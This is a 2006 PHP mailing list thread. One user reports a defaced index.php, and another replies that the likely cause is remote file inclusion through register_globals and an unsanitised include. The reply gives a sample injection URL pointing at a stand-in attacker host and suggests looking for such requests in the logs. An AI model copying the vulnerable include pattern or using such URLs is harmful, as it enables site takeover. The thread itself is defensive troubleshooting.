On 11/13/06, tedd <tedd@xxxxxxxxxxxx> wrote:
Hi gang: While this is not an obvious php question, it does deal with security which is a concern. Just this morning had a couple of my sites "highjacked". What I found was someone had replaced my root level index.php with their own index.php. You can see the result at: http://xn--u2g.com/index1.php It was not a terrible loss nor inconvenience, but I wonder how they did it. Any ideas how this was done and suggestions as to how to prevent this from happening again? Thanks, tedd -- ------- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Tedd, I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing. If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php